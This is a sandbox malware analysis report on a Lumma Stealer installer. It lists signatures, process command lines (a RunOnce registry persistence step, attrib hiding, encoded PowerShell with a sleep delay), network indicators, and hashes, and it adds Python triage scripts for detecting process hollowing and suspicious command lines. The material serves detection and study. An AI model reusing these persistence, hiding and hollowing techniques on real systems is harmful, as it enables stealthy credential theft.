Malware Analysis Report

2025-08-05 10:05

Sample ID 230501-n15e1ahb8s
Target pcworldx64installer.zip
SHA256 13716fdf716aa8479df57501ce208cae4fc31e5a5bb9f483764ba76fdbea4b0d
Tags
lumma evasion persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

13716fdf716aa8479df57501ce208cae4fc31e5a5bb9f483764ba76fdbea4b0d

Threat Level: Known bad

The file pcworldx64installer.zip was found to be: Known bad.

Malicious Activity Summary

lumma evasion persistence spyware stealer

Lumma Stealer

Sets file to hidden

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-01 11:52

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-01 11:52

Reported

2023-05-01 11:57

Platform

win10v2004-20230220-en

Max time kernel

136s

Max time network

155s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Setup_x64.exe.lnk

Signatures

Lumma Stealer

stealer lumma

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\particovl = "C:\\Users\\Admin\\AppData\\Roaming\\particovl.bat" C:\Windows\system32\reg.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 324 set thread context of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 784 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 784 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4416 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 4416 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2784 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2824 wrote to memory of 3764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2824 wrote to memory of 3764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2824 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 2824 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 2824 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 2824 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 2824 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
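The rows above are easier to read as a tree than as a table, and the tree is what separates the interesting write from the noise: every cmd.exe parent shows two writes into each child it spawns, which is consistent with ordinary process creation, while PID 324 writes ten times into PID 4720, a fresh copy of its own image, and then sets that child's thread context (the row under "Suspicious use of SetThreadContext"). That is the process hollowing sequence, and the memory/4720 dumps at 0x400000-0x507000 listed under Files are what the sandbox captured from that child. The script below, added here as an example and not part of the report or the sandbox's own logic, parses the rows exactly as printed, rebuilds the tree, and flags the edge where a process writes into a same-image child and then calls SetThreadContext. The row text is copied from the two tables above with a count per identical row; PID numbers and paths are the report's.

```python
"""Rebuild the process tree from WriteProcessMemory / SetThreadContext rows (added example)."""
import re
from collections import defaultdict

ROW_RE = re.compile(r'^PID (\d+) (wrote to memory of|set thread context of) (\d+) N/A (\S+) (\S+)$')

# Rows from the behavioral2 tables above, as (row text, number of identical rows).
SAMPLE_ROWS = [
    (r'PID 784 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe', 2),
    (r'PID 4416 wrote to memory of 2784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe', 2),
    (r'PID 2784 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe', 2),
    (r'PID 2824 wrote to memory of 3764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe', 2),
    (r'PID 2824 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe', 2),
    (r'PID 2824 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe', 3),
    (r'PID 324 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe', 3),
    (r'PID 324 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe', 10),
    (r'PID 2824 wrote to memory of 4672 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe', 2),
    (r'PID 324 set thread context of 4720 N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe', 1),
]


def sample_text() -> str:
    """Expand the (row, count) pairs back into the table as the report prints it."""
    return '\n'.join(row for row, n in SAMPLE_ROWS for _ in range(n))


def parse_rows(text: str) -> dict:
    """Aggregate rows into one record per (source PID, target PID) edge."""
    edges = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        src, action, dst, src_img, dst_img = m.groups()
        e = edges.setdefault((int(src), int(dst)), {'src_image': src_img, 'dst_image': dst_img,
                                                      'writes': 0, 'set_thread_context': False})
        if action.startswith('wrote'):
            e['writes'] += 1
        else:
            e['set_thread_context'] = True
    return edges


def process_tree(edges):
    """Parent map, child map and roots; the first writer into a PID is taken as its parent."""
    parents, children = {}, defaultdict(list)
    for src, dst in edges:
        if dst not in parents:
            parents[dst] = src
            children[src].append(dst)
    roots = sorted({src for src, _ in edges} - set(parents))
    return roots, dict(children), parents


def lineage(parents, pid):
    """Chain of PIDs from the root down to pid."""
    chain = [pid]
    while chain[-1] in parents:
        chain.append(parents[chain[-1]])
    return chain[::-1]


def hollowing_candidates(edges):
    """Writes into a child running the same image, followed by SetThreadContext:
    the sequence of process hollowing (ATT&CK T1055.012)."""
    return sorted((s, d) for (s, d), e in edges.items()
                  if e['set_thread_context'] and e['src_image'].lower() == e['dst_image'].lower())


def render(edges, children, pid, depth=0):
    """ASCII tree with per-edge write counts, for reading the chain at a glance."""
    lines = []
    for child in children.get(pid, []):
        e = edges[(pid, child)]
        name = e['dst_image'].rsplit('\\', 1)[-1]
        flag = ' [SetThreadContext]' if e['set_thread_context'] else ''
        lines.append(f"{'  ' * depth}{pid} -> {child} {name} (writes={e['writes']}){flag}")
        lines.extend(render(edges, children, child, depth + 1))
    return lines


if __name__ == '__main__':
    edges = parse_rows(sample_text())
    roots, children, parents = process_tree(edges)
    for root in roots:
        print('\n'.join(render(edges, children, root)))
    print('hollowing candidates:', hollowing_candidates(edges))
    print('lineage of 4720:', ' > '.join(map(str, lineage(parents, 4720))))
```

The same-image test is deliberately narrow: it catches the case this report shows (a process spawning a copy of itself and overwriting it) and will not fire on the cmd.exe to cmd.exe spawns because those rows carry no SetThreadContext. Injection into a different image (for example a suspended svchost.exe) would need the image comparison dropped and the write count used as the signal instead.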

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Setup_x64.exe.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /T:84 /C start "Starting Installation..." /B "%CD%\README.md\entry.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\README.md\entry.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat"

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v particovl /d "C:\Users\Admin\AppData\Roaming\particovl.bat"

C:\Windows\system32\attrib.exe

attrib +s +h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe -wIn 1 -enC …

Note on this process: the argument syntax is PowerShell's (-wIn 1 abbreviates -WindowStyle 1, i.e. Hidden; -enC abbreviates -EncodedCommand), and the dropped file's hashes differ between this Win10 run and the Win7 run below although the launching batch file is the same. This is consistent with particovl.bat.exe being a renamed copy of the host's own powershell.exe, so the double extension and the attrib +s +h step hide the interpreter, while the actual payload is the encoded command, which the report does not reproduce.

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==

The -ENC value is base64 of UTF-16LE text and decodes to: start-sleep -seconds 20 (a delay, likely to outlast short sandbox runs; compare the 30s kernel time of the Win7 run below, which never reaches the stealer stage).

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Windows\system32\attrib.exe

attrib -s -h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
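The process list above carries the four things a responder would want to pull out of any such chain: an encoded PowerShell command (whatever the binary is called), a reg add into Run/RunOnce whose target lives in a user-writable directory, an attrib +h (here with +s as well) on an executable, and an image whose name ends in a decoy double extension such as .bat.exe. The script below is an added example, not the sandbox's own signature logic or anything shipped with the sample; it runs those four checks over the command lines copied from this section. The encoded command of particovl.bat.exe is not reproduced in the report, so a constructed placeholder (PLACEHOLDER_B64, encoding the harmless text "Write-Host placeholder") stands in for it; the -ENC value of the child powershell.exe is the one printed above. Function and field names are the example's own.

```python
"""Triage helpers for command lines from a sandbox process list (added example)."""
import base64
import binascii
import re
from typing import Optional

# powershell.exe accepts abbreviations of -EncodedCommand (-e, -ec, -en, -enC, ...);
# the value is base64 of the script as UTF-16LE text, whatever the image is called.
ENC_RE = re.compile(r'(?<!\S)-e[ncodma]*\s+([A-Za-z0-9+/]{8,}={0,2})', re.I)
WINSTYLE_RE = re.compile(r'(?<!\S)-w[indowstyle]*\s+\S+', re.I)   # -w 1 / -wIn 1 / -WindowStyle Hidden
REG_ADD_RE = re.compile(r'^reg(?:\.exe)?\s+add\s+"?([^"\s]+)"?(.*)$', re.I)
RUN_KEY_RE = re.compile(r'\\currentversion\\run(?:once)?$', re.I)
ATTRIB_RE = re.compile(r'(?:^|\\)attrib(?:\.exe)?$', re.I)
DOUBLE_EXT_RE = re.compile(r'\.(?:bat|cmd|txt|pdf|doc|jpg|png|md)\.exe$', re.I)
# Directories a standard user can write to; a Run/RunOnce value pointing here is worth a look.
USER_WRITABLE = ('\\appdata\\', '\\temp\\', '\\users\\public\\', '\\programdata\\')

# Constructed stand-in for the encoded payload, which the report does not reproduce.
PLACEHOLDER_B64 = base64.b64encode('Write-Host placeholder'.encode('utf-16-le')).decode()

# Command lines copied from the behavioral2 process list above (sample input for this example).
SAMPLE_CMDLINES = [
    r'cmd /c C:\Users\Admin\AppData\Local\Temp\Setup_x64.exe.lnk',
    r'"C:\Windows\System32\cmd.exe" /T:84 /C start "Starting Installation..." /B "%CD%\README.md\entry.bat"',
    r'C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat"',
    r'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v particovl /d "C:\Users\Admin\AppData\Roaming\particovl.bat"',
    r'attrib +s +h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe',
    r'C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe -wIn 1 -enC ' + PLACEHOLDER_B64,
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==',
    r'attrib -s -h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe',
]


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a -EncodedCommand value; None if it is not base64 of UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode('utf-16-le')
    except (binascii.Error, UnicodeDecodeError):
        return None


def image_of(cmdline: str) -> str:
    """First token of the command line with surrounding quotes removed."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)) if m else ''


def triage(cmdline: str) -> list:
    """Return the findings for one command line; an empty list means nothing matched."""
    findings = []
    image = image_of(cmdline)
    # 1. Encoded PowerShell, decoded so the analyst sees the script rather than the blob.
    for m in ENC_RE.finditer(cmdline):
        script = decode_encoded_command(m.group(1))
        if script is not None:
            findings.append({'kind': 'encoded_command', 'image': image, 'script': script})
    # 2. reg add into a Run/RunOnce key; note whether the target is in a user-writable directory.
    m = REG_ADD_RE.match(cmdline.strip())
    if m and RUN_KEY_RE.search(m.group(1)):
        name = re.search(r'/v\s+"?([^"\s]+)', m.group(2), re.I)
        data = re.search(r'/d\s+(?:"([^"]*)"|(\S+))', m.group(2), re.I)
        target = (data.group(1) or data.group(2) or '') if data else ''
        findings.append({'kind': 'run_key', 'key': m.group(1), 'name': name.group(1) if name else None,
                         'target': target, 'user_writable': any(p in target.lower() for p in USER_WRITABLE)})
    # 3. attrib +h hides a file; record whether +s was added too and whether it is an executable.
    if ATTRIB_RE.search(image) and '+h' in cmdline.lower():
        target = cmdline.split()[-1].strip('"')   # paths with spaces would need real argv parsing
        findings.append({'kind': 'hidden_file', 'target': target, 'system': '+s' in cmdline.lower(),
                         'executable': target.lower().endswith('.exe')})
    # 4. An image with a decoy double extension, and whether it is driven like PowerShell.
    if DOUBLE_EXT_RE.search(image):
        findings.append({'kind': 'double_extension', 'image': image,
                         'powershell_style_args': bool(WINSTYLE_RE.search(cmdline) or ENC_RE.search(cmdline))})
    return findings


def triage_all(cmdlines) -> list:
    """Flat list of findings over many command lines."""
    return [f for c in cmdlines for f in triage(c)]


if __name__ == '__main__':
    for finding in triage_all(SAMPLE_CMDLINES):
        print(finding)
```

Run against the list above this yields two decoded scripts, one RunOnce finding (value particovl, target under AppData\Roaming), one hidden_file finding for the +s +h call (the later -s -h call is not a hide and is ignored), and one double_extension finding whose image is launched with PowerShell-style flags; the opening cmd /c line produces nothing. The decoder is the piece worth keeping on its own: EDR telemetry and event ID 4688 give you the same -EncodedCommand blobs, and the abbreviation-tolerant regex matters because samples rarely spell the parameter out.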

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 acrhitechinfo.com udp
US 192.185.235.142:443 acrhitechinfo.com tcp
US 8.8.8.8:53 142.235.185.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 20.42.65.89:443 tcp
NL 8.238.20.126:80 tcp
NL 8.238.177.126:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
PL 82.118.23.50:80 tcp
US 40.125.122.176:443 tcp
US 8.8.8.8:53 203.151.224.20.in-addr.arpa udp
NL 8.238.177.126:80 tcp
NL 8.238.177.126:80 tcp
PL 82.118.23.50:80 tcp
US 40.125.122.176:443 tcp
PL 82.118.23.50:80 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
PL 82.118.23.50:80 tcp
PL 82.118.23.50:80 tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

memory/324-139-0x0000000004D40000-0x0000000004D76000-memory.dmp

memory/324-140-0x00000000053B0000-0x00000000059D8000-memory.dmp

memory/324-141-0x0000000005230000-0x0000000005252000-memory.dmp

memory/324-142-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-145-0x0000000005A50000-0x0000000005AB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oeihadb1.ogb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/324-144-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-143-0x00000000059E0000-0x0000000005A46000-memory.dmp

memory/324-155-0x0000000006080000-0x000000000609E000-memory.dmp

memory/324-156-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-157-0x00000000079E0000-0x000000000805A000-memory.dmp

memory/324-158-0x00000000065F0000-0x000000000660A000-memory.dmp

memory/324-159-0x0000000007290000-0x00000000072CC000-memory.dmp

memory/2648-160-0x0000000005330000-0x0000000005340000-memory.dmp

memory/2648-161-0x0000000005330000-0x0000000005340000-memory.dmp

memory/324-171-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-172-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/324-173-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/2648-175-0x0000000005330000-0x0000000005340000-memory.dmp

memory/2648-176-0x0000000005330000-0x0000000005340000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

memory/4720-181-0x0000000000400000-0x0000000000507000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 de88087c4f3ef0a38b1346b23abed67c
SHA1 be684579b18ffb443aae273a16c5df077d1d5227
SHA256 3dcb60716c8c9620f080754ccd9a6185df7a124dc66f436807f9ddd247ed2558
SHA512 93dfe69609af62e618a938ed054b10528d96f24c76b67e9c32f9ef066d3cdd82994339074320f224a9b079713ed4339ffd8422e3f0ca1573a8ad9798554d2be1

memory/4720-185-0x0000000000400000-0x0000000000507000-memory.dmp

memory/4720-186-0x0000000000400000-0x0000000000507000-memory.dmp

memory/4720-188-0x0000000000400000-0x0000000000507000-memory.dmp

memory/4720-189-0x0000000000400000-0x0000000000507000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-01 11:52

Reported

2023-05-01 11:57

Platform

win7-20230220-en

Max time kernel

30s

Max time network

34s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Setup_x64.exe.lnk

Signatures

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\particovl = "C:\\Users\\Admin\\AppData\\Roaming\\particovl.bat" C:\Windows\system32\reg.exe N/A

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2044 wrote to memory of 1176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 2044 wrote to memory of 1176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 2044 wrote to memory of 1176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 1176 wrote to memory of 832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1176 wrote to memory of 832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 1176 wrote to memory of 832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 832 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 832 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 832 wrote to memory of 396 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 396 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 396 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 396 wrote to memory of 324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 396 wrote to memory of 336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 396 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 396 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 396 wrote to memory of 888 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe
PID 396 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Setup_x64.exe.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /T:84 /C start "Starting Installation..." /B "%CD%\README.md\entry.bat"

C:\Windows\system32\cmd.exe

